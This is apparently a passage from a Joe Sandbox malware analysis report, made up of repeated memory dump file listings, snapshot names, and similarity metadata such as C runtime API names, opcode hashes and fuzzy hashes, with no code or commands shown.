                                                                                                                                            • Associated: 00000000.00000002.1695092498.0000000000680000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695124931.0000000000693000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695139408.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695153961.0000000000696000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695168343.0000000000697000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695200717.0000000000698000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695213601.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695232057.00000000006B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695247078.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695262924.00000000006C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695281765.00000000006D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695300594.00000000006EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695315547.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695329478.00000000006F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695343794.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695359304.00000000006FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695373645.0000000000704000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695388666.0000000000705000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695402775.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695421233.000000000071F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695436344.0000000000723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695449969.0000000000724000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695465729.0000000000727000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695479810.0000000000728000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695494583.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695511240.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695526129.0000000000742000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695542046.000000000074D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000076B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695597549.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695612933.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695627779.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695642712.00000000007A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695657164.00000000007A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695672860.00000000007B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695687359.00000000007B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_490000_file.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 8bfb7b8e78c370f2913f61a25c6defe040cdd2114a4e27868ad6e7523cb31ccb
                                                                                                                                            • Instruction ID: 1ef91bcb264713a87bb3459c226fa407c2bb8d13c41e1bb7d7b4da8002537770
                                                                                                                                            • Opcode Fuzzy Hash: 8bfb7b8e78c370f2913f61a25c6defe040cdd2114a4e27868ad6e7523cb31ccb
                                                                                                                                            • Instruction Fuzzy Hash: 83E04636921268EBCB15DB998905E9AB2ACEB49B08B65019AB901D3261C274DE00C7D4
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1693695905.0000000000491000.00000040.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1693562113.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1693695905.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694324251.00000000004F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694367536.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694411712.0000000000505000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694428980.0000000000506000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694445434.0000000000507000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694654030.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695074453.000000000066B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.0000000000680000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695124931.0000000000693000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695139408.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695153961.0000000000696000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695168343.0000000000697000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695200717.0000000000698000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695213601.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695232057.00000000006B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695247078.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695262924.00000000006C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695281765.00000000006D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695300594.00000000006EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695315547.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695329478.00000000006F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695343794.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695359304.00000000006FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695373645.0000000000704000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695388666.0000000000705000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695402775.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695421233.000000000071F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695436344.0000000000723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695449969.0000000000724000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695465729.0000000000727000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695479810.0000000000728000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695494583.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695511240.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695526129.0000000000742000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695542046.000000000074D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000076B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695597549.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695612933.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695627779.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695642712.00000000007A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695657164.00000000007A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695672860.00000000007B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695687359.00000000007B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_490000_file.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 57040152-0
                                                                                                                                            • Opcode ID: af71c57f624a7ac74c27960fcafe1bc4abd73d371845adc87d87cc30da51d88f
                                                                                                                                            • Instruction ID: dc53816def0140e44b51e635582f41c5cc09f4ec3cc19f5f02fb0fdbcb13d38e
                                                                                                                                            • Opcode Fuzzy Hash: af71c57f624a7ac74c27960fcafe1bc4abd73d371845adc87d87cc30da51d88f
                                                                                                                                            • Instruction Fuzzy Hash: 08A1FF71A00205AFDF20DF65C94576BBBA8FF26315F00817AE815D7351EB39EA04CB99
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1693695905.0000000000491000.00000040.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1693562113.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1693695905.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694324251.00000000004F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694367536.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694411712.0000000000505000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694428980.0000000000506000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694445434.0000000000507000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694654030.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695074453.000000000066B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.0000000000680000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695124931.0000000000693000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695139408.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695153961.0000000000696000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695168343.0000000000697000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695200717.0000000000698000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695213601.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695232057.00000000006B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695247078.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695262924.00000000006C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695281765.00000000006D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695300594.00000000006EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695315547.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695329478.00000000006F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695343794.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695359304.00000000006FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695373645.0000000000704000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695388666.0000000000705000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695402775.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695421233.000000000071F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695436344.0000000000723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695449969.0000000000724000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695465729.0000000000727000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695479810.0000000000728000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695494583.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695511240.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695526129.0000000000742000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695542046.000000000074D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000076B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695597549.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695612933.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695627779.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695642712.00000000007A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695657164.00000000007A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695672860.00000000007B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695687359.00000000007B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_490000_file.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _strrchr
                                                                                                                                            • String ID: vL
                                                                                                                                            • API String ID: 3213747228-3795732311
                                                                                                                                            • Opcode ID: e735d7118d15e2b04af68ee7be9476ee50b6c15cebd4be360e770f4c3f107c3f
                                                                                                                                            • Instruction ID: 0c6004d1cc7043698fd9565fc5c5e7bb96cc14ded5f667656ae16fa100f65eea
                                                                                                                                            • Opcode Fuzzy Hash: e735d7118d15e2b04af68ee7be9476ee50b6c15cebd4be360e770f4c3f107c3f
                                                                                                                                            • Instruction Fuzzy Hash: F3B1043A9042459FDB11CF68C8D1BAEBBA5EF46340F1441AFE859DB341D6388D42CB68
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1693695905.0000000000491000.00000040.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1693562113.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1693695905.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694324251.00000000004F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694367536.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694411712.0000000000505000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694428980.0000000000506000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694445434.0000000000507000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694654030.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695074453.000000000066B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.0000000000680000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695124931.0000000000693000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695139408.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695153961.0000000000696000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695168343.0000000000697000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695200717.0000000000698000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695213601.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695232057.00000000006B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695247078.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695262924.00000000006C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695281765.00000000006D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695300594.00000000006EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695315547.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695329478.00000000006F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695343794.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695359304.00000000006FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695373645.0000000000704000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695388666.0000000000705000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695402775.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695421233.000000000071F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695436344.0000000000723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695449969.0000000000724000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695465729.0000000000727000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695479810.0000000000728000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695494583.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695511240.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695526129.0000000000742000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695542046.000000000074D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000076B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695597549.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695612933.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695627779.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695642712.00000000007A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695657164.00000000007A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695672860.00000000007B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695687359.00000000007B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_490000_file.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 531285432-0
                                                                                                                                            • Opcode ID: dd0f39ccd7b6624bd848005e2ec42c66086dcc741876b75caaac0e71ecdcc661
                                                                                                                                            • Instruction ID: 4ccfa79796973260811645a5ee21b6d51e9469621d621e68816f9042bc8363e1
                                                                                                                                            • Opcode Fuzzy Hash: dd0f39ccd7b6624bd848005e2ec42c66086dcc741876b75caaac0e71ecdcc661
                                                                                                                                            • Instruction Fuzzy Hash: 64214F75A00109AFDF00EFA5CC819BEB7B9EF19714F10006AF601BB291DB789D019BA4
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1693695905.0000000000491000.00000040.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1693562113.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1693695905.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694324251.00000000004F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694367536.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694411712.0000000000505000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694428980.0000000000506000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694445434.0000000000507000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694654030.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695074453.000000000066B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.0000000000680000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695124931.0000000000693000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695139408.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695153961.0000000000696000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695168343.0000000000697000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695200717.0000000000698000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695213601.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695232057.00000000006B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695247078.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695262924.00000000006C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695281765.00000000006D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695300594.00000000006EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695315547.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695329478.00000000006F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695343794.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695359304.00000000006FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695373645.0000000000704000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695388666.0000000000705000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695402775.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695421233.000000000071F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695436344.0000000000723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695449969.0000000000724000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695465729.0000000000727000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695479810.0000000000728000.00000080.00000001.01000000.00000003.sdmpDownload File
